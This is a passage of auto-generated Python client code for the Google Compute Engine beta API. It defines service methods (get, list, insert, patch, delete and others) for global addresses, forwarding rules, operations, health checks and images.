request_type_name=u'ComputeGlobalAddressesGetRequest',
response_type_name=u'Address',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates an address resource in the specified project using the data included in the request.
Args:
request: (ComputeGlobalAddressesInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.globalAddresses.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/addresses',
request_field=u'address',
request_type_name=u'ComputeGlobalAddressesInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of global addresses.
Args:
request: (ComputeGlobalAddressesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(AddressList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.globalAddresses.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/addresses',
request_field='',
request_type_name=u'ComputeGlobalAddressesListRequest',
response_type_name=u'AddressList',
supports_download=False,
)
def SetLabels(self, request, global_params=None):
"""Sets the labels on a GlobalAddress. To learn more about labels, read the Labeling Resources documentation.
Args:
request: (ComputeGlobalAddressesSetLabelsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetLabels')
return self._RunMethod(
config, request, global_params=global_params)
SetLabels.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.globalAddresses.setLabels',
ordered_params=[u'project', u'resource'],
path_params=[u'project', u'resource'],
query_params=[],
relative_path=u'projects/{project}/global/addresses/{resource}/setLabels',
request_field=u'globalSetLabelsRequest',
request_type_name=u'ComputeGlobalAddressesSetLabelsRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeGlobalAddressesTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.globalAddresses.testIamPermissions',
ordered_params=[u'project', u'resource'],
path_params=[u'project', u'resource'],
query_params=[],
relative_path=u'projects/{project}/global/addresses/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeGlobalAddressesTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
class GlobalForwardingRulesService(base_api.BaseApiService):
"""Service class for the globalForwardingRules resource."""
_NAME = u'globalForwardingRules'
def __init__(self, client):
super(ComputeBeta.GlobalForwardingRulesService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified GlobalForwardingRule resource.
Args:
request: (ComputeGlobalForwardingRulesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.globalForwardingRules.delete',
ordered_params=[u'project', u'forwardingRule'],
path_params=[u'forwardingRule', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/forwardingRules/{forwardingRule}',
request_field='',
request_type_name=u'ComputeGlobalForwardingRulesDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified GlobalForwardingRule resource. Get a list of available forwarding rules by making a list() request.
Args:
request: (ComputeGlobalForwardingRulesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ForwardingRule) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.globalForwardingRules.get',
ordered_params=[u'project', u'forwardingRule'],
path_params=[u'forwardingRule', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/forwardingRules/{forwardingRule}',
request_field='',
request_type_name=u'ComputeGlobalForwardingRulesGetRequest',
response_type_name=u'ForwardingRule',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a GlobalForwardingRule resource in the specified project using the data included in the request.
Args:
request: (ComputeGlobalForwardingRulesInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.globalForwardingRules.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/forwardingRules',
request_field=u'forwardingRule',
request_type_name=u'ComputeGlobalForwardingRulesInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of GlobalForwardingRule resources available to the specified project.
Args:
request: (ComputeGlobalForwardingRulesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ForwardingRuleList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.globalForwardingRules.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/forwardingRules',
request_field='',
request_type_name=u'ComputeGlobalForwardingRulesListRequest',
response_type_name=u'ForwardingRuleList',
supports_download=False,
)
def SetLabels(self, request, global_params=None):
"""Sets the labels on the specified resource. To learn more about labels, read the Labeling Resources documentation.
Args:
request: (ComputeGlobalForwardingRulesSetLabelsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetLabels')
return self._RunMethod(
config, request, global_params=global_params)
SetLabels.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.globalForwardingRules.setLabels',
ordered_params=[u'project', u'resource'],
path_params=[u'project', u'resource'],
query_params=[],
relative_path=u'projects/{project}/global/forwardingRules/{resource}/setLabels',
request_field=u'globalSetLabelsRequest',
request_type_name=u'ComputeGlobalForwardingRulesSetLabelsRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetTarget(self, request, global_params=None):
"""Changes target URL for the GlobalForwardingRule resource. The new target should be of the same type as the old target.
Args:
request: (ComputeGlobalForwardingRulesSetTargetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetTarget')
return self._RunMethod(
config, request, global_params=global_params)
SetTarget.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.globalForwardingRules.setTarget',
ordered_params=[u'project', u'forwardingRule'],
path_params=[u'forwardingRule', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/forwardingRules/{forwardingRule}/setTarget',
request_field=u'targetReference',
request_type_name=u'ComputeGlobalForwardingRulesSetTargetRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeGlobalForwardingRulesTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.globalForwardingRules.testIamPermissions',
ordered_params=[u'project', u'resource'],
path_params=[u'project', u'resource'],
query_params=[],
relative_path=u'projects/{project}/global/forwardingRules/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeGlobalForwardingRulesTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
class GlobalOperationsService(base_api.BaseApiService):
"""Service class for the globalOperations resource."""
_NAME = u'globalOperations'
def __init__(self, client):
super(ComputeBeta.GlobalOperationsService, self).__init__(client)
self._upload_configs = {
}
def AggregatedList(self, request, global_params=None):
"""Retrieves an aggregated list of all operations.
Args:
request: (ComputeGlobalOperationsAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(OperationAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.globalOperations.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/operations',
request_field='',
request_type_name=u'ComputeGlobalOperationsAggregatedListRequest',
response_type_name=u'OperationAggregatedList',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified Operations resource.
Args:
request: (ComputeGlobalOperationsDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ComputeGlobalOperationsDeleteResponse) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.globalOperations.delete',
ordered_params=[u'project', u'operation'],
path_params=[u'operation', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/operations/{operation}',
request_field='',
request_type_name=u'ComputeGlobalOperationsDeleteRequest',
response_type_name=u'ComputeGlobalOperationsDeleteResponse',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Retrieves the specified Operations resource. Get a list of operations by making a list() request.
Args:
request: (ComputeGlobalOperationsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.globalOperations.get',
ordered_params=[u'project', u'operation'],
path_params=[u'operation', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/operations/{operation}',
request_field='',
request_type_name=u'ComputeGlobalOperationsGetRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of Operation resources contained within the specified project.
Args:
request: (ComputeGlobalOperationsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(OperationList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.globalOperations.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/operations',
request_field='',
request_type_name=u'ComputeGlobalOperationsListRequest',
response_type_name=u'OperationList',
supports_download=False,
)
class HealthChecksService(base_api.BaseApiService):
"""Service class for the healthChecks resource."""
_NAME = u'healthChecks'
def __init__(self, client):
super(ComputeBeta.HealthChecksService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified HealthCheck resource.
Args:
request: (ComputeHealthChecksDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.healthChecks.delete',
ordered_params=[u'project', u'healthCheck'],
path_params=[u'healthCheck', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/healthChecks/{healthCheck}',
request_field='',
request_type_name=u'ComputeHealthChecksDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified HealthCheck resource. Get a list of available health checks by making a list() request.
Args:
request: (ComputeHealthChecksGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(HealthCheck) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.healthChecks.get',
ordered_params=[u'project', u'healthCheck'],
path_params=[u'healthCheck', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/healthChecks/{healthCheck}',
request_field='',
request_type_name=u'ComputeHealthChecksGetRequest',
response_type_name=u'HealthCheck',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a HealthCheck resource in the specified project using the data included in the request.
Args:
request: (ComputeHealthChecksInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.healthChecks.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/healthChecks',
request_field=u'healthCheck',
request_type_name=u'ComputeHealthChecksInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of HealthCheck resources available to the specified project.
Args:
request: (ComputeHealthChecksListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(HealthCheckList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.healthChecks.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/healthChecks',
request_field='',
request_type_name=u'ComputeHealthChecksListRequest',
response_type_name=u'HealthCheckList',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Updates a HealthCheck resource in the specified project using the data included in the request. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.
Args:
request: (ComputeHealthChecksPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PATCH',
method_id=u'compute.healthChecks.patch',
ordered_params=[u'project', u'healthCheck'],
path_params=[u'healthCheck', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/healthChecks/{healthCheck}',
request_field=u'healthCheckResource',
request_type_name=u'ComputeHealthChecksPatchRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeHealthChecksTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.healthChecks.testIamPermissions',
ordered_params=[u'project', u'resource'],
path_params=[u'project', u'resource'],
query_params=[],
relative_path=u'projects/{project}/global/healthChecks/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeHealthChecksTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
def Update(self, request, global_params=None):
"""Updates a HealthCheck resource in the specified project using the data included in the request.
Args:
request: (ComputeHealthChecksUpdateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Update')
return self._RunMethod(
config, request, global_params=global_params)
Update.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PUT',
method_id=u'compute.healthChecks.update',
ordered_params=[u'project', u'healthCheck'],
path_params=[u'healthCheck', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/healthChecks/{healthCheck}',
request_field=u'healthCheckResource',
request_type_name=u'ComputeHealthChecksUpdateRequest',
response_type_name=u'Operation',
supports_download=False,
)
class HttpHealthChecksService(base_api.BaseApiService):
"""Service class for the httpHealthChecks resource."""
_NAME = u'httpHealthChecks'
def __init__(self, client):
super(ComputeBeta.HttpHealthChecksService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified HttpHealthCheck resource.
Args:
request: (ComputeHttpHealthChecksDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.httpHealthChecks.delete',
ordered_params=[u'project', u'httpHealthCheck'],
path_params=[u'httpHealthCheck', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/httpHealthChecks/{httpHealthCheck}',
request_field='',
request_type_name=u'ComputeHttpHealthChecksDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified HttpHealthCheck resource. Get a list of available HTTP health checks by making a list() request.
Args:
request: (ComputeHttpHealthChecksGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(HttpHealthCheck) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.httpHealthChecks.get',
ordered_params=[u'project', u'httpHealthCheck'],
path_params=[u'httpHealthCheck', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/httpHealthChecks/{httpHealthCheck}',
request_field='',
request_type_name=u'ComputeHttpHealthChecksGetRequest',
response_type_name=u'HttpHealthCheck',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a HttpHealthCheck resource in the specified project using the data included in the request.
Args:
request: (ComputeHttpHealthChecksInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.httpHealthChecks.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/httpHealthChecks',
request_field=u'httpHealthCheck',
request_type_name=u'ComputeHttpHealthChecksInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of HttpHealthCheck resources available to the specified project.
Args:
request: (ComputeHttpHealthChecksListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(HttpHealthCheckList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.httpHealthChecks.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/httpHealthChecks',
request_field='',
request_type_name=u'ComputeHttpHealthChecksListRequest',
response_type_name=u'HttpHealthCheckList',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Updates a HttpHealthCheck resource in the specified project using the data included in the request. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.
Args:
request: (ComputeHttpHealthChecksPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PATCH',
method_id=u'compute.httpHealthChecks.patch',
ordered_params=[u'project', u'httpHealthCheck'],
path_params=[u'httpHealthCheck', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/httpHealthChecks/{httpHealthCheck}',
request_field=u'httpHealthCheckResource',
request_type_name=u'ComputeHttpHealthChecksPatchRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeHttpHealthChecksTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.httpHealthChecks.testIamPermissions',
ordered_params=[u'project', u'resource'],
path_params=[u'project', u'resource'],
query_params=[],
relative_path=u'projects/{project}/global/httpHealthChecks/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeHttpHealthChecksTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
def Update(self, request, global_params=None):
"""Updates a HttpHealthCheck resource in the specified project using the data included in the request.
Args:
request: (ComputeHttpHealthChecksUpdateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Update')
return self._RunMethod(
config, request, global_params=global_params)
Update.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PUT',
method_id=u'compute.httpHealthChecks.update',
ordered_params=[u'project', u'httpHealthCheck'],
path_params=[u'httpHealthCheck', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/httpHealthChecks/{httpHealthCheck}',
request_field=u'httpHealthCheckResource',
request_type_name=u'ComputeHttpHealthChecksUpdateRequest',
response_type_name=u'Operation',
supports_download=False,
)
class HttpsHealthChecksService(base_api.BaseApiService):
"""Service class for the httpsHealthChecks resource."""
_NAME = u'httpsHealthChecks'
def __init__(self, client):
super(ComputeBeta.HttpsHealthChecksService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified HttpsHealthCheck resource.
Args:
request: (ComputeHttpsHealthChecksDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.httpsHealthChecks.delete',
ordered_params=[u'project', u'httpsHealthCheck'],
path_params=[u'httpsHealthCheck', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/httpsHealthChecks/{httpsHealthCheck}',
request_field='',
request_type_name=u'ComputeHttpsHealthChecksDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified HttpsHealthCheck resource. Get a list of available HTTPS health checks by making a list() request.
Args:
request: (ComputeHttpsHealthChecksGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(HttpsHealthCheck) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.httpsHealthChecks.get',
ordered_params=[u'project', u'httpsHealthCheck'],
path_params=[u'httpsHealthCheck', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/httpsHealthChecks/{httpsHealthCheck}',
request_field='',
request_type_name=u'ComputeHttpsHealthChecksGetRequest',
response_type_name=u'HttpsHealthCheck',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a HttpsHealthCheck resource in the specified project using the data included in the request.
Args:
request: (ComputeHttpsHealthChecksInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.httpsHealthChecks.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/httpsHealthChecks',
request_field=u'httpsHealthCheck',
request_type_name=u'ComputeHttpsHealthChecksInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of HttpsHealthCheck resources available to the specified project.
Args:
request: (ComputeHttpsHealthChecksListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(HttpsHealthCheckList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.httpsHealthChecks.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/httpsHealthChecks',
request_field='',
request_type_name=u'ComputeHttpsHealthChecksListRequest',
response_type_name=u'HttpsHealthCheckList',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Updates a HttpsHealthCheck resource in the specified project using the data included in the request. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.
Args:
request: (ComputeHttpsHealthChecksPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PATCH',
method_id=u'compute.httpsHealthChecks.patch',
ordered_params=[u'project', u'httpsHealthCheck'],
path_params=[u'httpsHealthCheck', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/httpsHealthChecks/{httpsHealthCheck}',
request_field=u'httpsHealthCheckResource',
request_type_name=u'ComputeHttpsHealthChecksPatchRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeHttpsHealthChecksTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.httpsHealthChecks.testIamPermissions',
ordered_params=[u'project', u'resource'],
path_params=[u'project', u'resource'],
query_params=[],
relative_path=u'projects/{project}/global/httpsHealthChecks/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeHttpsHealthChecksTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
def Update(self, request, global_params=None):
"""Updates a HttpsHealthCheck resource in the specified project using the data included in the request.
Args:
request: (ComputeHttpsHealthChecksUpdateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Update')
return self._RunMethod(
config, request, global_params=global_params)
Update.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PUT',
method_id=u'compute.httpsHealthChecks.update',
ordered_params=[u'project', u'httpsHealthCheck'],
path_params=[u'httpsHealthCheck', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/httpsHealthChecks/{httpsHealthCheck}',
request_field=u'httpsHealthCheckResource',
request_type_name=u'ComputeHttpsHealthChecksUpdateRequest',
response_type_name=u'Operation',
supports_download=False,
)
class ImagesService(base_api.BaseApiService):
"""Service class for the images resource."""
_NAME = u'images'
def __init__(self, client):
super(ComputeBeta.ImagesService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified image.
Args:
request: (ComputeImagesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.images.delete',
ordered_params=[u'project', u'image'],
path_params=[u'image', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/images/{image}',
request_field='',
request_type_name=u'ComputeImagesDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Deprecate(self, request, global_params=None):
"""Sets the deprecation status of an image.
If an empty request body is given, clears the deprecation status instead.
Args:
request: (ComputeImagesDeprecateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Deprecate')
return self._RunMethod(
config, request, global_params=global_params)
Deprecate.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.images.deprecate',
ordered_params=[u'project', u'image'],
path_params=[u'image', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/images/{image}/deprecate',
request_field=u'deprecationStatus',
request_type_name=u'ComputeImagesDeprecateRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified image. Get a list of available images by making a list() request.
Args:
request: (ComputeImagesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Image) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.images.get',
ordered_params=[u'project', u'image'],
path_params=[u'image', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/images/{image}',
request_field='',
